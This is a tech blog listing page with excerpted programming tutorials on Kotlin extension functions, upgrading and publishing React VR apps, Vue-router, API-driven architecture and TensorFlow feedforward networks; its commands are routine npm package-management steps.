<generic primate noise>" open class GiantApe(name: String) : Primate(name) fun GiantApe.speak() = "${this.name} :<scary 100db roar>" fun printSpeak(primate: Primate) { println(primate.speak()) } printSpeak(Primate("Koko")) printSpeak(GiantApe("Kong")) If we execute this code, we can see this on the console: In this case, it is still the same behavior as with the previous examples, but using the right value for name. Speaking of which, we can reference name with name and this.name; both are valid. Extension functions as members Extension functions can be declared as members of a class. An instance of a class with extension functions declared is called the dispatch receiver. The Caregiver open class internally defines, extension functions for two different classes, Feline and Primate: open class Caregiver(val name: String) { open fun Feline.react() = "PURRR!!!" fun Primate.react() = "*$name plays with ${this@Caregiver.name}*" fun takeCare(feline: Feline) { println("Feline reacts: ${feline.react()}") } fun takeCare(primate: Primate){ println("Primate reacts: ${primate.react()}") } } Both extension functions are meant to be used inside an instance of Caregiver. Indeed, it is a good practice to mark member extension functions as private, if they aren't open. In the case of Primate.react(), we are using the name value from Primate and the name value from Caregiver. To access members with a name conflict, the extension receiver (this) takes precedence and to access members of the dispatcher receiver, the qualified this syntax must be used. Other members of the dispatcher receiver that don't have a name conflict can be used without qualified this. Don't get confused by the various means of this that we have already covered: Inside a class, this means the instance of that class Inside an extension function, this means the instance of the receiver type like the first parameter in our utility function with a nice syntax: class Dispatcher { val dispatcher: Dispatcher = this fun Int.extension(){ val receiver: Int = this val dispatcher: Dispatcher = this@Dispatcher } } Going back to our Zoo example, we instantiate a Caregiver, a Cat, and a Primate, and we invoke the function Caregiver.takeCare with both animal instances: val adam = Caregiver("Adam") val fulgencio = Cat() val koko = Primate("Koko") adam.takeCare(fulgencio) adam.takeCare(koko) If we execute this code, we can see this on the console: Any zoo needs a veterinary surgeon. The class Vet extends Caregiver: open class Vet(name: String): Caregiver(name) { override fun Feline.react() = "*runs away from $name*" } We override the Feline.react() function with a different implementation. We are also using the Vet class's name directly, as the Feline class doesn't have a property name: val brenda = Vet("Brenda") listOf(adam, brenda).forEach { caregiver -> println("${caregiver.javaClass.simpleName} ${caregiver.name}") caregiver.takeCare(fulgencio) caregiver.takeCare(koko) } After which, we get the following output: Extension functions with conflicting names What happens when an extension function has the same name as a member function? The Worker class has a function work(): String and a private function rest(): String. We also have two extension functions with the same signature, work and rest: class Worker { fun work() = "*working hard*" private fun rest() = "*resting*" } fun Worker.work() = "*not working so hard*" fun <T> Worker.work(t:T) = "*working on $t*" fun Worker.rest() = "*playing video games*" Having extension functions with the same signature isn't a compilation error, but a warning: Extension is shadowed by a member: public final fun work(): String It is legal to declare a function with the same signature as a member function, but the member function always takes precedence, therefore, the extension function is never invoked. This behavior changes when the member function is private, in this case, the extension function takes precedence. It is also possible to overload an existing member function with an extension function: val worker = Worker() println(worker.work()) println(worker.work("refactoring")) println(worker.rest()) On execution, work() invokes the member function and work(String) and rest() are extension functions: Extension functions for objects In Kotlin, objects are a type, therefore they can have functions, including extension functions (among other things, such as extending interfaces and others). We can add a buildBridge extension function to the object, Builder: object Builder { } fun Builder.buildBridge() = "A shinny new bridge" We can include companion objects. The class Designer has two inner objects, the companion object and Desk object: class Designer { companion object { } object Desk { } } fun Designer.Companion.fastPrototype() = "Prototype" fun Designer.Desk.portofolio() = listOf("Project1", "Project2") Calling this functions works like any normal object member function: Designer.fastPrototype() Designer.Desk.portofolio().forEach(::println) So there you have it! You now know how to take advantage of extension functions in Kotlin. If you found this tutorial helpful and would like to learn more, head on over to purchase the full book, Functional Kotlin, by Mario Arias and Rivu Chakraborty. Forget C and Java. Learn Kotlin: the next universal programming language 5 reasons to choose Kotlin over Java Building chat application with Kotlin using Node.js, the powerful Server-side JavaScript platform
Read more
  • 0
  • 0
  • 27625

article-image-upgrading-packaging-publishing-react-vr-app
Sunith Shetty
08 Jun 2018
19 min read
Save for later

Upgrading, packaging, and publishing your React VR app

Sunith Shetty
08 Jun 2018
19 min read
It is fun to develop and experience virtual worlds at home. Eventually, though, you want the world to see your creation. To do that, we need to package and publish our app. In the course of development, upgrades to React may come along; before publishing, you will need to decide whether you need to "code freeze" and ship with a stable version, or upgrade to a new version. This is a design decision. In today’s tutorial, we will learn to upgrade React VR and bundle the code in order to publish on the web. This article is an excerpt from a book written by John Gwinner titled Getting Started with React VR. This book will get you well-versed with Virtual Reality (VR) and React VR components to create your own VR apps. One of the neat things, although it can be frustrating, is that web projects are frequently updated.  There are a couple of different ways to do an upgrade: You can install/create a new app with the same name You will then go to your old app and copy everything over This is a facelift upgrade or Rip and Replace Do an update. Mostly, this is an update to package.json, and then delete node_modules and rebuild it. This is an upgrade in place. It is up to you which method you use, but the major difference is that an upgrade in place is somewhat easier—no source code to modify and copy—but it may or may not work. A Facelift upgrade also relies on you using the correct react-vr-cli. There is a notice that runs whenever you run React VR from the Command Prompt that will tell you whether it's old: The error or warning that comes up about an upgrade when you run React VR from a Command Prompt may fly by quickly. It takes a while to run, so you may go away for a cup of coffee. Pay attention to red lines, seriously. To do an upgrade in place, you will typically get an update notification from Git if you have subscribed to the project. If you haven't, you should go to: http://bit.ly/ReactVR, create an account (if you don't have one already), and click on the eyeball icon to join the watch list. Then, you will get an email every time there is an upgrade. We will cover the most straightforward way to do an upgrade—upgrade in place, first. Upgrading in place How do you know what version of React you have installed? From a Node.js prompt, type this: npm list react-vr Also, check the version of react-vr-web: npm list react-vr-web Check the version of react-vr-cli (the command-line interface, really only for creating the hello world app). npm list react-vr-cli Check the version of ovrui (open VR's user interface): npm list ovrui You can check these against the versions on the documentation. If you've subscribed to React VR on GitHub (and you should!), then you will get an email telling you that there is an upgrade. Note that the CLI will also tell you if it is out of date, although this only applies when you are creating a new application (folder/website). The release notes are at: http://bit.ly/VRReleases . There, you will find instructions to upgrade. The upgrade instructions usually have you do the following: Delete your node_modules directory. Open your package.json file. Update react-vr, react-vr-web, and ovrui to "New version number" for example, 2.0.0. Update react to "a.b.c". Update react-native to "~d.e.f". Update three to "^g.h.k". Run npm install or yarn. Note the ~ and ^ symbols; ~version means approximately equivalent to version and ^version means compatible with version. This is a help, as you may have other packages that may want other versions of react-native and three, specifically. To get the values of {a...k}, refer to the release notes. I have also found that you may need to include these modules in the devDependencies section of package.json: "react-devtools": "^2.5.2", "react-test-renderer": "16.0.0", You may see this error: module.js:529 throw err; ^ Error: Cannot find module './node_modules/react-native/packager/blacklist' If you do, make the following changes in your projects root folder in the rncli.config.js file. Replace the var blacklist = require('./node_modules/react-native/packager/blacklist'); line with var blacklist = require('./node_modules/metro-bundler/src/blacklist');. Third-party dependencies If you have been experimenting and adding modules with npm install <something>, you may find, after an upgrade, that things do not work. The package.json file also needs to know about all the additional packages you installed during experimentation. This is the project way (npm way) to ensure that Node.js knows we need a particular piece of software. If you have this issue, you'll need to either repeat the install with the—save parameter, or edit the dependencies section in your package.json file. { "name": "WalkInAMaze", "version": "0.0.1", "private": true, "scripts": { "start": "node -e "console.log('open browser at http://localhost:8081/vr/\n\n');" && node node_modules/react-native/local-cli/cli.js start", "bundle": "node node_modules/react-vr/scripts/bundle.js", "open": "node -e "require('xopen')('http://localhost:8081/vr/')"", "devtools": "react-devtools", "test": "jest" }, "dependencies": { "ovrui": "~2.0.0", "react": "16.0.0", "react-native": "~0.48.0", "three": "^0.87.0", "react-vr": "~2.0.0", "react-vr-web": "~2.0.0", "mersenne-twister": "^1.1.0" }, "devDependencies": { "babel-jest": "^19.0.0", "babel-preset-react-native": "^1.9.1", "jest": "^19.0.2", "react-devtools": "^2.5.2", "react-test-renderer": "16.0.0", "xopen": "1.0.0" }, "jest": { "preset": "react-vr" } } Again, this is the manual way; a better way is to use npm install <package> -save. The -s qualifier saves the new package you've installed in package.json. The manual edits can be handy to ensure that you've got the right versions if you get a version mismatch. If you mess around with installing and removing enough packages, you will eventually mess up your modules. If you get errors even after removing node_modules, issue these commands: npm cache clean --force npm start -- --reset-cache The cache clean won't do it by itself; you need the reset-cache, otherwise, the problem packages will still be saved, even if they don't physically exist! Really broken upgrades – rip and replace If, however, after all that work, your upgrade still does not work, all is not lost. We can do a rip and replace upgrade. Note that this is sort of a "last resort", but it does work fairly well. Follow these steps: Ensure that your react-vr-cli package is up to date, globally: [F:ReactVR]npm install react-vr-cli -g C:UsersJohnAppDataRoamingnpmreact-vr -> C:UsersJohnAppDataRoamingnpmnode_modulesreact-vr-cliindex.js + react-vr-cli@0.3.6 updated 8 packages in 2.83s This is important, as when there is a new version of React, you may not have the most up-to-date react-vr-cli. It will tell you when you use it that there is a newer version out, but that line frequently scrolls by; if you get bored and don't note, you can spend a lot of time trying to install an updated version, to no avail. An npm generates a lot of verbiage, but it is important to read what it says, especially red formatted lines. Ensure that all CLI (DOS) windows, editing sessions, Node.js running CLIs, and so on, are closed. (You shouldn't need to reboot, however; just close everything using the old directory). Rename the old code to MyAppName140 (add a version number to the end of the old react-vr directory). Create the application, using react-vr init MyAppName, in other words, the original app name. The next step is easiest using a diff program (refer to http://bit.ly/WinDiff). I use Beyond Compare, but there are other ones too. Choose one and install it, if needed. Compare the two directories, .MyAppName (new) and .MyAppName140, and see what files have changed. Move over any new files from your old app, including assets (you can probably copy over the entire static_assets folder). Merge any files that have changed, except package.json. Generally, you will need to merge these files: index.vr.js client.js (if you changed it) For package.json, see what lines have been added, and install those packages in the new app via npm install <missed package> --save, or start the app and see what is missing. Remove any files seeded by the hello world app, such as chess-world.jpg (unless you are using that background, of course). Usually, you don't change the rn-cli.config.js file (unless you modified the seeded version). Most code will move directly over. Ensure that you change the application name if you changed the directory name, but with the preceding directions, you won't have to. The preceding list of upgrade steps may be slightly easier if there are massive changes to React VR; it will require some picking through source files. The source is pretty straightforward, so this should be easy in practice. I found that these techniques will work best if the automatic upgrade did not work. As mentioned earlier, the time to do a major upgrade probably is not right before publishing the app, unless there is some new feature you need. You want to adequately test your app to ensure that there aren't any bugs. I'm including the upgrade steps here, though, but not because you should do it right before publishing. Getting your code ready to publish Honestly, you should never put off organizing your clothes until, oh, wait, we're talking about code. You should never put off organizing your code until the night you want to ship it. Even the code you think is throw away may end up in production. Learn good coding habits and style from the beginning. Good code organization Good code, from the very start, is very important for many reasons: If your code uses sloppy indentation, it's more difficult to read. Many code editors, such as Visual Studio Code, Atom, and Webstorm, will format code for you, but don't rely on these tools. Poor naming conventions can hide problems. An improper case on variables can hide problems, such as using this.State instead of this.state. Most of the time spent coding, as much as 80%, is in maintenance. If you can't read the code, you can't maintain it. When you're a starting out programmer, you frequently think you'll always be able to read your own code, but when you pick up a piece years later and say "Who wrote this junk?" and then realize it was you, you will quit doing things like a, b, c, d variable names and the like. Most software at some point is maintained, read, copied, or used by someone other than the author. Most programmers think code standards are for "the other guy," yet complain when they have to code well. Who then does? Most programmers will immediately ask for the code documentation and roll their eyes when they don't find it. I usually ask to see the documentation they wrote for their last project. Every programmer I've hired usually gives me a deer in the headlights look. This is why I usually require good comments in the code. A good comment is not something like this: //count from 99 to 1 for (i=99; i>0; i--) ... A good comment is this: //we are counting bottles of beer for (i=99; i>0; i--) ... Cleaning the lint trap (checking code standards) When you wash clothes, the lint builds up and will eventually clog your washing machine or dryer, or cause a fire. In the PC world, old code, poorly typed names, and all can also build up. Refactoring is one way to clean up the code. I highly recommend that you use some form of version control, such as Git or bitbucket to check your code; while refactoring, it's quite possible to totally mess up your code and if you don't use version control, you may lose a lot of work. A great way to do a code review of your work, before you publish, is to use a linter. Linters go through your code and point out problems (crud), improper syntax, things that may work differently than you intend, and generally try to pick up your room after you, like your mom does. While you might not like it if your mom does that, these tools are invaluable. Computers are, after all, very picky and why not use the machines against each other? One of the most common ways to let software check your software for JavaScript is a program called ESLint. You can read about it at: http://bit.ly/JSLinter. To install ESLint, you can do it via npm like most packages—npm install eslint --save-dev. The --save-dev option puts a requirement in your project while you are developing. Once you've published your app, you won't need to pack the ESLint information with your project! There are a number of other things you need to get ESLint to work properly; read the configuration pages and go through the tutorials. A lot depends on what IDE you use. You can use ESLint with Visual Studio, for example. Once you've installed ESLint, you need to configure a local configuration file. Do this with eslint --init. The --init command will display a prompt that will ask you how to configure the rules it will follow. It will ask a series of questions, and ask what style to use. AirBNB is fairly common, although you can use others; there's no wrong choice. If you are working for a company, they may already have standards, so check with management. One of the prompts will ask if you need React. React VR coding style Coding style can be nearly religious, but in the JavaScript and React world, some standards are very common. AirBNB has one good, fairly well–regarded style guide at: http://bit.ly/JStyle. For React VR, some style options to consider are as follows: Use lowercase for the first letter of a variable name. In other words, this.props.currentX, not this.props.CurrentX, and don't use underscores (this is called camelCase). Use PascalCase only when naming constructors or classes. As you're using PascalCase for files, make the filename match the class, so   import MyClass from './MyClass'. Be careful about 0 vs {0}. In general, learn JavaScript and React. Always use const or let to declare variables to avoid polluting the global namespace. Avoid using ++ and --. This one was hard for me, being a C++ programmer. Hopefully, by the time you've read this, I've fixed it in the source examples. If not, do as I say, not as I do! Learn the difference between == and ===, and use them properly, another thing that is new for C++ and C# programmers. In general, I highly recommend that you pour over these coding styles and use a linter when you write your code: Third-party dependencies For your published website/application to really work reliably, we also need to update package.json; this is sort of the "project" way to ensure that Node.js knows we need a particular piece of software. We will edit the "dependencies" section to add the last line,(bold emphasis mine, bold won't show up in a text editor, obviously!): { "name": "WalkInAMaze", "version": "0.0.1", "private": true, "scripts": { "start": "node -e "console.log('open browser at http://localhost:8081/vr/\n\n');" && node node_modules/react-native/local-cli/cli.js start", "bundle": "node node_modules/react-vr/scripts/bundle.js", "open": "node -e "require('xopen')('http://localhost:8081/vr/')"", "devtools": "react-devtools", "test": "jest" }, "dependencies": { "ovrui": "~2.0.0", "react": "16.0.0", "react-native": "~0.48.0", "three": "^0.87.0", "react-vr": "~2.0.0", "react-vr-web": "~2.0.0", "mersenne-twister": "^1.1.0" }, "devDependencies": { "babel-jest": "^19.0.0", "babel-preset-react-native": "^1.9.1", "jest": "^19.0.2", "react-devtools": "^2.5.2", "react-test-renderer": "16.0.0", "xopen": "1.0.0" }, "jest": { "preset": "react-vr" } } This is the manual way; a better way is to use npm install <package> -s. The -s qualifier saves the new package you've installed in package.json. The manual edits can be handy to ensure that you've got the right versions, if you get a version mismatch. If you mess around with installing and removing enough packages, you will eventually mess up your modules. If you get errors, even after removing node_modules, issue these commands: npm start -- --reset-cache npm cache clean --force The cache clean won't do it by itself; you need the reset–cache, otherwise the problem packages will still be saved, even if they don't physically exist! Bundling for publishing on the web Assuming that you have your project dependencies set up correctly to get your project to run from a web server, typically through an ISP or service provider, you need to "bundle" it. React VR has a script that will package up everything into just a few files. Note, of course, that your desktop machine counts as a "web server", although I wouldn't recommend that you expose your development machine to the web. The better way to have other people experience your new Virtual Reality is to bundle it and put it on a commercial web service. Packaging React VR for release on a website The basic process is easy with the React VR provided script: Go to the VR directory where you normally run npm start, and run the npm run bundle command: You will then go to your website the same way you normally upload files, and create a directory called vr. In your project directory, in our case f:ReactVRWalkInAMaze, find the following files in .VRBuild: client.bundle.js index.bundle.js Copy those to your website. Make a directory called static_assets. Copy all of your files (that your app uses) from AppNamestatic_assets to the new static_assets folder. Ensure that you have MIME mapping set up for all of your content; in particular, .obj, .mtl, and .gltf files may need new mappings. Check with your web server documentation: For gltf files, use model/gltf-binary Any .bin files used by gltf should be application/octet-stream For .obj files, I've used application/octet-stream The official list is at http://bit.ly/MimeTypes Very generally, application/octet-stream will send the files "exactly" as they are on the server, so this is sort of a general purpose "catch all" Copy the index.html from the root of your application to the directory on your website where you are publishing the app; in our case, it'll be the vr directory, so the file is alongside the two .js files. Modify index.html for the following lines (note the change to ./index.vr): <html> <head> <title>WalkInAMaze</title> <style>body { margin: 0; }</style> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> </head> <body> <!-- When you're ready to deploy your app, update this line to point to your compiled client.bundle.js --> <script src="./client.bundle?platform=vr"></script> <script> // Initialize the React VR application ReactVR.init( // When you're ready to deploy your app, update this line to point to // your compiled index.bundle.js './index.vr.bundle?platform=vr&dev=false', // Attach it to the body tag document.body ); </script> </body> </html> Note for a production release, which means if you're pointing to a prebuilt bundle on a static web server and not the React Native bundler, the dev and platform flags actually won't do anything, so there's no difference between dev=true, dev=false, or even dev=foobar. Obtaining releases and attribution If you used any assets from anywhere on the web, ensure that you have the proper release. For example, many Daz3D or Poser models do not include the rights to publish the geometry information; including these on your website as an OBJ or glTF file may be a violation of that agreement. Someone could easily download the model, or nearly all the geometry fairly easily, and then use it for something else. I am not a lawyer; you should check with wherever you get your models to ensure that you have permission, and if necessary, attribute properly. Attribution licenses are a little difficult with a VR world, unless you embed the attribution into a graphic somewhere; as we've seen, adding text can sometimes be distracting, and you will always have scale issues. If you embed a VR world in a page with <iframe>, you can always give proper attribution on the HTML side. However, this isn't really VR. Checking image sizes and using content delivery sites Some of the images you use, especially the ones in a <pano> statement, can be quite large. You may need to optimize these for proper web speed and responsiveness. This is a fairly general topic, but one thing that can help is a content delivery network (CDN), especially if your world will be a high-volume one. Adding a CDN to your web server is easy. You host your asset files from a separate location, and you pass the root directory as the assetRoot at the ReactVR.init() call. For example, if your files were hosted at https://cdn.example.com/vr_assets/, you would change the method call in index.html to include the following third argument: ReactVR.init( './index.bundle.js?platform=vr&dev=false', document.body, { assetRoot: 'https://cdn.example.com/vr_assets/' } ); Optimizing your models If you were watching the web console, you may have noted this model being loaded over and over. It is not necessarily the most efficient way. Consider other techniques such as passing a model for the various child components as a prop. Polygon decimation is another technique that is very valuable in optimizing models for the web and VR. With the glTF file format, you can use "normal maps" and still make a low polygon model look like a high-resolution one. Techniques to do this are well documented in the game development field. These techniques really do work well. You should also optimize models to not display unseen geometry. If you are showing a car model with blacked out windows, for example, there is no need to have engine detail and interior details loaded (unless the windows are transparent). This sounds obvious, although I found the lamp that I used to illustrate the lighting examples had almost tripled the number of polygons than was needed; the glass lamp shade had inner and outer polygons that were inside the model. We learned to do version upgrades, and if need be, how to do rip and replace upgrades. We further discussed when to do an upgrade and how to publish it on the web. If you are interested to know about how to include existing high-performance web code into a VR app, you may refer to the book Getting Started with React VR.   Build a Virtual Reality Solar System in Unity for Google Cardboard Understanding the hype behind Magic Leap’s New Augmented Reality Headsets Leap Motion open sources its $100 augmented reality headset, North Star
Read more
  • 0
  • 0
  • 20134

article-image-working-with-the-vue-router-plugin-for-spas
Pravin Dhandre
07 Jun 2018
5 min read
Save for later

Working with the Vue-router plugin for SPAs

Pravin Dhandre
07 Jun 2018
5 min read
Single-Page Applications (SPAs) are web applications that load a single HTML page and updates that page dynamically based on the user interaction with the app. These SPAs use AJAX and HTML5 for creating fluid and responsive web applications without any requirement of constant page reloads. In this tutorial, we will show a step-by-step approach of how to install an extremely powerful plugin Vue-router to build Single Page Applications. This article is an excerpt from a book written by Mike Street, titled Vue.js 2.x by Example. Similar to how you add Vue and Vuex to your applications, you can either directly include the library from unpkg, or head to the following URL and download a local copy for yourself: https://unpkg.com/Vue-router. Add the JavaScript to a new HTML document, along with Vue, and your application's JavaScript. Create an application container element, your view, as well. In the following example, I have saved the Vue-router JavaScript file as router.js: Initialize VueRouter in your JavaScript application We are now ready to add VueRouter and utilize its power. Before we do that, however, we need to create some very simple components which we can load and display based on the URL. As we are going to be loading the components with the router, we don't need to register them with Vue.component, but instead create JavaScript objects with the same properties as we would a Vue component. For this first exercise, we are going to create two pages—Home and About pages. Found on most websites, these should help give you context as to what is loading where and when. Create two templates in your HTML page for us to use: Don't forget to encapsulate all your content in one "root" element (represented here by the wrapping div tags). You also need to ensure you declare the templates before your application JavaScript is loaded. We've created a Home page template, with the id of homepage, and an About page, containing some placeholder text from lorem ipsum, with the id of about. Create two components in your JavaScript which reference these two templates: The next step is to give the router a placeholder to render the components in the view. This is done by using a custom <router-view> HTML element. Using this element gives you control over where your content will render. It allows us to have a header and footer right in the app view, without needing to deal with messy templates or include the components themselves. Add a header, main, and footer element to your app. Give yourself a logo in the header and credits in the footer; in the main HTML element, place the router-view placeholder: Everything in the app view is optional, except the router-view, but it gives you an idea of how the router HTML element can be implemented into a site structure. The next stage is to initialize the Vue-router and instruct Vue to use it. Create a new instance of VueRouter and add it to the Vue instance—similar to how we added Vuex in the previous section: We now need to tell the router about our routes (or paths), and what component it should load when it encounters each one. Create an object inside the Vue-router instance with a key of routes and an array as the value. This array needs to include an object for each route: Each route object contains a path and component key. The path is a string of the URL that you want to load the component on. Vue-router serves up components based on a first-come-first-served basis. For example, if there are several routes with the same path, the first one encountered is used. Ensure each route has the beginning slash—this tells the router it is a root page and not a sub-page. Press save and view your app in the browser. You should be presented with the content of the Home template component. If you observe the URL, you will notice that on page load a hash and forward slash (#/) are appended to the path. This is the router creating a method for browsing the components and utilizing the address bar. If you change this to the path of your second route, #/about, you will see the contents of the About component. Vue-router is also able to use the JavaScript history API to create prettier URLs. For example, yourdomain.com/index.html#about would become yourdomain.com/about. This is activated by adding mode: 'history' to your VueRouter instance: With this, you should now be familiar with Vue-router and how to initialize it for creating new routes and paths for different web pages on your website. Do check out the book Vue.js 2.x by Example to start developing building blocks for a successful e-commerce website. What is React.js and how does it work? Why has Vue.js become so popular? Building a real-time dashboard with Meteor and Vue.js
Read more
  • 0
  • 0
  • 25950
article-image-architects-love-api-driven-architecture
Aaron Lazar
07 Jun 2018
6 min read
Save for later

8 Reasons why architects love API driven architecture

Aaron Lazar
07 Jun 2018
6 min read
Everyday, we see a new architecture popping up, being labeled as a modern architecture for application development. That’s what happened with Microservices in the beginning, and then all went for a toss when they were termed as a design pattern rather than an architecture on a whole. APIs are growing in popularity and are even being used as a basis to draw out the architecture of applications. We’re going to try and understand what some of the top factors are, which make Architects (and Developers) appreciate API driven architectures over the other “modern” and upcoming architectures. Before we get to the reasons, let’s understand where I’m coming from in the first place. So, we recently published our findings from the Skill Up survey that we conducted for 8,000 odd IT pros. We asked them various questions ranging from what their favourite tools were, to whether they felt they knew more than what their managers did. Of the questions, one of them was directed to find out which of the modern architectures interested them the most. The choices were among Chaos Engineering, API Driven Architecture and Evolutionary Architecture. Source: Skill Up 2018 From the results, it's evident that they’re more inclined towards API driven Architecture. Or maybe, those who didn’t really find the architecture of their choice among the lot, simply chose API driven to be the best of the lot. But why do architects love API driven development? Anyway, I’ve been thinking about it a bit and thought I would come up with a few reasons as to why this might be so. So here goes… Reason #1: The big split between the backend and frontend Also known as Split Stack Development, API driven architecture allows for the backend and frontend of the application to be decoupled. This allows developers and architects to mitigate any dependencies that each end might have or rather impose on the other. Instead of having the dependencies, each end communicates with the other via APIs. This is extremely beneficial in the sense that each end can be built in completely different tools and technologies. For example, the backend could be in Python/Java, while the front end is built in JavaScript. Reason #2: Sensibility in scalability When APIs are the foundation of an architecture, it enables the organisation to scale the app by simply plugging in services as and when needed, instead of having to modify the app itself. This is a great way to plugin and plugout functionality as and when needed without disrupting the original architecture. Reason #3: Parallel Development aka Agile When different teams work on the front and back end of the application, there’s no reason for them to be working together. That doesn’t mean they don’t work together at all, rather, what I mean is that the only factor they have to agree upon is the API structure and nothing else. This is because of Reason #1, where both layers of the architecture are disconnected or decoupled. This enables teams to be more flexible and agile when developing the application. It is only at the testing and deployment stages that the teams will collaborate more. Reason #4: API as a product This is more of a business case, rather than developer centric, but I thought I should add it in anyway. So, there’s something new that popped up on the Thoughtworks Radar, a few months ago - API-as-a-product.  As a matter of fact, you could consider this similar to API-as-a-Service. Organisations like Salesforce have been offering their services in the form of APIs. For example, suppose you’re using Salesforce CRM and you want to extend the functionality, all you need to do is use the APIs for extending the system. Google is another good example of a company that offers APIs as products. This is a great way to provide extensibility instead of having a separate application altogether. Individual APIs or groups of them can be priced with subscription plans. These plans contain not only access to the APIs themselves, but also a defined number of calls or data that is allowed. Reason #5: Hiding underlying complexity In an API driven architecture, all components that are connected to the API are modular, exist on their own and communicate via the API. The modular nature of the application makes it easier to test and maintain. Moreover, if you’re using or consuming someone else’s API, you needn’t learn/decipher the entire code’s working, rather you can just plug in the API and use it. That reduces complexity to a great extent. Reason #6: Business Logic comes first API driven architecture allows developers to focus on the Business Logic, rather than having to worry about structuring the application. The initial API structure is all that needs to be planned out, after which each team goes forth and develops the individual APIs. This greatly reduces development time as well. Reason #7: IoT loves APIs API architecture makes for a great way to build IoT applications, as IoT needs a great deal of scalability. An application that is built on a foundation of APIs is a dream for IoT developers as devices can be easily connected to the mother app. I expect everything to be connected via APIs in the next 5 years. If it doesn’t happen, you can always get back at me in the comments section! ;) Reason #8: APIs and DevOps are a match made in Heaven APIs allow for a more streamlined deployment pipeline, while also eliminating the production of duplicate assets by development teams. Moreover, deployments can reach production a lot faster through these slick pipelines, thus increasing efficiency and reducing costs by a great deal. The merger of DevOps and API driven architecture, however, is not a walk in the park, as it requires a change in mindset. Teams need to change culturally, to become enablers of reusable, self-service consumption. The other side of the coin Well, there’s always two sides to the coin, and there are some drawbacks to API driven architecture. For starters, you’ll have APIs all over the place! While that was the point in the first place, it becomes really tedious to manage all those APIs. Secondly, when you have things running in parallel, you require a lot of processing power - more cores, more infrastructure. Another important issue is regarding security. With so many cyber attacks, and privacy breaches, an API driven architecture only invites trouble with more doors for hackers to open. So apart from the above flipside, those were some of the reasons I could think of, as to why Architects would be interested in an API driven architecture. APIs give customers, i.e both internal and external stakeholders, the freedom to leverage enterprise’s assets, while customizing as required. In a way, APIs aren’t just ways to offer integration and connectivity for large enterprise apps. Rather, they should be looked at as a way to drive faster and more modern software architecture and delivery. What are web developers favorite front-end tools? The best backend tools in web development The 10 most common types of DoS attacks you need to know
Read more
  • 0
  • 0
  • 40172

article-image-feedforward-networks-tensorflow
Aarthi Kumaraswamy
07 Jun 2018
12 min read
Save for later

Implementing feedforward networks with TensorFlow

Aarthi Kumaraswamy
07 Jun 2018
12 min read
Deep feedforward networks, also called feedforward neural networks, are sometimes also referred to as Multilayer Perceptrons (MLPs). The goal of a feedforward network is to approximate the function of f∗. For example, for a classifier, y=f∗(x) maps an input x to a label y. A feedforward network defines a mapping from input to label y=f(x;θ). It learns the value of the parameter θ that results in the best function approximation. This tutorial is an excerpt from the book, Neural Network Programming with Tensorflow by Manpreet Singh Ghotra, and Rajdeep Dua. With this book, learn how to implement more advanced neural networks like CCNs, RNNs, GANs, deep belief networks and others in Tensorflow. How do feedforward networks work? Feedforward networks are a conceptual stepping stone on the path to recurrent networks, which power many natural language applications. Feedforward neural networks are called networks because they compose together many different functions which represent them. These functions are composed in a directed acyclic graph. The model is associated with a directed acyclic graph describing how the functions are composed together. For example, there are three functions f(1), f(2), and f(3) connected to form f(x) =f(3)(f(2)(f(1)(x))). These chain structures are the most commonly used structures of neural networks. In this case, f(1) is called the first layer of the network, f(2) is called the second layer, and so on. The overall length of the chain gives the depth of the model. It is from this terminology that the name deep learning arises. The final layer of a feedforward network is called the output layer. Diagram showing various functions activated on input x to form a neural network These networks are called neural because they are inspired by neuroscience. Each hidden layer is a vector. The dimensionality of these hidden layers determines the width of the model. Implementing feedforward networks with TensorFlow Feedforward networks can be easily implemented using TensorFlow by defining placeholders for hidden layers, computing the activation values, and using them to calculate predictions. Let's take an example of classification with a feedforward network: X = tf.placeholder("float", shape=[None, x_size]) y = tf.placeholder("float", shape=[None, y_size]) weights_1 = initialize_weights((x_size, hidden_size), stddev) weights_2 = initialize_weights((hidden_size, y_size), stddev) sigmoid = tf.nn.sigmoid(tf.matmul(X, weights_1)) y = tf.matmul(sigmoid, weights_2) Once the predicted value tensor has been defined, we calculate the cost function: cost = tf.reduce_mean(tf.nn.OPERATION_NAME(labels=<actual value>, logits=<predicted value>)) updates_sgd = tf.train.GradientDescentOptimizer(sgd_step).minimize(cost) Here, OPERATION_NAME could be one of the following: tf.nn.sigmoid_cross_entropy_with_logits: Calculates sigmoid cross entropy on incoming logits and labels: sigmoid_cross_entropy_with_logits( _sentinel=None, labels=None, logits=None, name=None )Formula implemented is max(x, 0) - x * z + log(1 + exp(-abs(x))) _sentinel: Used to prevent positional parameters. Internal, do not use. labels: A tensor of the same type and shape as logits. logits: A tensor of type float32 or float64. The formula implemented is ( x = logits, z = labels) max(x, 0) - x * z + log(1 + exp(-abs(x))). tf.nn.softmax: Performs softmax activation on the incoming tensor. This only normalizes to make sure all the probabilities in a tensor row add up to one. It cannot be directly used in a classification. softmax = exp(logits) / reduce_sum(exp(logits), dim) logits: A non-empty tensor. Must be one of the following types--half, float32, or float64. dim: The dimension softmax will be performed on. The default is -1, which indicates the last dimension. name: A name for the operation (optional). tf.nn.log_softmax: Calculates the log of the softmax function and helps in normalizing underfitting. This function is also just a normalization function. log_softmax( logits, dim=-1, name=None ) logits: A non-empty tensor. Must be one of the following types--half, float32, or float64. dim: The dimension softmax will be performed on. The default is -1, which indicates the last dimension. name: A name for the operation (optional). tf.nn.softmax_cross_entropy_with_logits softmax_cross_entropy_with_logits( _sentinel=None, labels=None, logits=None, dim=-1, name=None ) _sentinel: Used to prevent positional parameters. For internal use only. labels: Each rows labels[i] must be a valid probability distribution. logits: Unscaled log probabilities. dim: The class dimension. Defaulted to -1, which is the last dimension. name: A name for the operation (optional). The preceding code snippet computes softmax cross entropy between logits and labels. While the classes are mutually exclusive, their probabilities need not be. All that is required is that each row of labels is a valid probability distribution. For exclusive labels, use (where one and only one class is true at a time) sparse_softmax_cross_entropy_with_logits. tf.nn.sparse_softmax_cross_entropy_with_logits sparse_softmax_cross_entropy_with_logits( _sentinel=None, labels=None, logits=None, name=None ) labels: Tensor of shape [d_0, d_1, ..., d_(r-1)] (where r is the rank of labels and result) and dtype, int32, or int64. Each entry in labels must be an index in [0, num_classes). Other values will raise an exception when this operation is run on the CPU and return NaN for corresponding loss and gradient rows on the GPU. logits: Unscaled log probabilities of shape [d_0, d_1, ..., d_(r-1), num_classes] and dtype, float32, or float64. The preceding code computes sparse softmax cross entropy between logits and labels. The probability of a given label is considered exclusive. Soft classes are not allowed, and the label's vector must provide a single specific index for the true class for each row of logits. tf.nn.weighted_cross_entropy_with_logits 